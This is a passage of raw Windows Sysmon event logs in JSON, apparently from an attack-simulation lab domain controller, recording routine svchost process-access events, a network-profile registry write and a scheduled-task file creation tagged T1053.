YSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":901,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+23c28|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+23c28|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":902,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.334\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+1671d|c:\\windows\\system32\\lsm.dll+23c39|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.334","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+1671d|c:\\windows\\system32\\lsm.dll+23c39|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+d69b2|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":903,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: \r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:48:59.350\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nProcessId: 1196\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{1C4380BB-3862-41F1-B425-7E74397CF5D1}\\DateLastConnected\r\nDetails: Binary Data","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.350","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001015C40000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{1C4380BB-3862-41F1-B425-7E74397CF5D1}\\DateLastConnected","Details":"Binary Data","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":904,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.365\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010B6CA0000}\r\nTargetProcessId: 1268\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.365","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010B6CA0000}","TargetProcessId":"1268","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":905,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: T1053\r\nUtcTime: 2020-08-01 06:48:59.381\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetFilename: C:\\Windows\\Tasks\\SA.DAT\r\nCreationUtcTime: 2016-09-12 11:34:03.403","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"T1053","UtcTime":"2020-08-01 06:48:59.381","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetFilename":"C:\\Windows\\Tasks\\SA.DAT","CreationUtcTime":"2016-09-12 11:34:03.403","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":906,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.428\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.428","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":907,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.428\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.428","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":908,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.428\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.428","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":909,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.428\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.428","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":910,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.428\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00100FBA0000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: 